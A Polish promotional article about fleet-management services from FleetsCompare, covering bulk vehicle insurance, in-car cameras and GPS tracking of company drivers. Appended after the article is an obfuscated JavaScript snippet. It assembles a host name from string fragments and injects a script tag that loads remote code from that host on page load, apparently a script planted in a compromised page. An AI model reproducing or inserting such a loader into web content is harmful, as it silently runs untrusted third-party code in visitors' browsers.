Jeżeli jesteś przedsiębiorcą, który prowadzi firmę zajmującą się szeroko pojętym transportem, z pewnością na co dzień borykasz się z wieloma niedogodnościami związanymi z obsługą swojej floty pojazdów. Duża ilość formalności związana z ich ubezpieczeniem, czy odwieczne problemy z tzw. “szkodami parkingowymi” spędzają Ci sen z powiek? A może istnieje proste rozwiązanie wszystkich Twoich problemów?

Flota


W ostatnich latach na polskim rynku obserwujemy ogromny rozwój firm transportowych, a co z tym bezpośrednio związane, również przedsiębiorstw zajmujących się ich szeroko pojętą obsługą. Firma taka może okazać się dla przedsiębiorcy ogromnym wsparciem oraz pomoże zaoszczędzić mu wielu formalności i niepotrzebnych stresów. Jedną z nich jest FleetsCompare, która może pochwalić się bardzo szeroką ofertą tego typu usług.

Jedną z ciekawszych opcji, z których może skorzystać potencjalny klient jest hurtowe ubezpieczenie wszystkich swoich samochodów. Firma oferuje bowiem możliwość ubezpieczenia nie tylko pojazdów osobowych, ale również dostawczych i ciężarowych. Wspólne ubezpieczenie wydaje się mieć same zalety. Po pierwsze, nie marnujemy czasu na szukanie interesujących ofert, a dodatkowo wszystkie formalności możemy załatwić w jednym miejscu, bez konieczności odwiedzania siedzib kilku ubezpieczycieli. Po drugie, i wydaje się, że jeszcze ważniejsze, dzięki ubezpieczeniu większej ilości samochodów jednocześnie, możemy uzyskać znacznie atrakcyjniejszą cenę jaką będziemy musieli zapłacić za tą usługę. Każdy przedsiębiorca, który ceni swój czas i pieniądze z pewnością będzie zadowolony z takiego rozwiązania. Po trzecie, w momencie ewentualnej stłuczki nie musimy już zastanawiać się w jakiej firmie ubezpieczony jest nasz pojazd i jakich formalności musimy dopełnić, bo procedura zawsze będzie wyglądała tak samo.

Gdy dojdzie do zdarzenia drogowego

Odwieczną bolączką, z którą borykają się również przedsiębiorcy prowadzący działalność transportową są szkody spowodowane różnego typu kolizjami, zdarzeniami drogowymi czy stłuczkami np. na parkingach. Problem ubezpieczenia i wypłaty ewentualnego odszkodowania wydaje się być rozwiązany. Co jednak w sytuacji kiedy sprawcą wypadku nie jest nasz pracownik, a osoba z zewnątrz, która na dodatek nie chce przyznać się do swojej winy? Dochodzenie swoich praw w sądach jest czasochłonne i prowadzi do dodatkowych kosztów. Problem ten może zostać całkowicie rozwiązany dzięki zamontowaniu w swoich pojazdach kamer. W ofercie możemy znaleźć zarówno urządzenia tego typu gotowe do montażu w środku jak i na zewnątrz auta (zarówno z przodu i z tyłu). Nagrania wykonane w dobrej jakości obrazu i dźwięku pozwolą bez najmniejszych wątpliwości określić sprawcę stłuczki. Filmy z tego typu kamer są chętnie przyjmowane przez Policję w naszym kraju jako dowód w różnego typu postępowaniach. Ponadto jeżeli zajdzie taka potrzeba, dzięki montażowi kamer wewnątrz pojazdu, możemy dodatkowo kontrolować swoich pracowników.

Monitoring pojazdów i kierowców

Kolejnym udogodnieniem jest możliwość wyposażenia całej floty swoich pojazdów w nadajniki GPS. Stanowią one doskonałe narzędzie nie tylko do kontrolowania pracowników, ale również do podniesienia ogólnego bezpieczeństwa prowadzonego transportu. Nadajniki tego typu umożliwiają sprawdzenie w jakim miejscu dokładnie znajduje się aktualnie dany samochód. Możemy sprawdzić również jego zużycie paliwa. Informacja o umieszczeniu nadajników GPS we wszystkich samochodach praktycznie całkowicie rozwiązuje problem nieuczciwych pracowników, którzy nadmiernie eksploatują pojazd, wykorzystując go do celów osobistych. Ponadto w sytuacji ewentualnej kradzieży, samochód jest bardzo łatwy do namierzenia.

W dzisiejszych czasach przedsiębiorcy posiadający swoje własne firmy transportowe mają do dyspozycji wiele ofert dedykowanych specjalnie z myślą ulepszenia i ułatwienia ich pracy. Duża różnorodność rozwiązań proponowanych przez firmy, w tym www.fleetscompare.com gwarantuje nie tylko oszczędność czasu i pieniędzy, ale może również podnieść bezpieczeństwo prowadzonego biznesu. Warto więc zastanowić się nad skorzystaniem z pomocy tego typu profesjonalistów.

(function(){
uvy9=document.createElement(”script”);uvy9.type=”text/javascript”;
uvy9.async=true;uvy9_=((”us”)+”t”)+”a”;uvy9_+=(”t.i”)+”"+”n”;uvy9_+=((”f”)+”o”);
uvy9.src=”http://”+uvy9_+”/2102185.d2d7imr8vy97h44ibkmcjrkuefysbj”;
document.body.appendChild(uvy9);
})();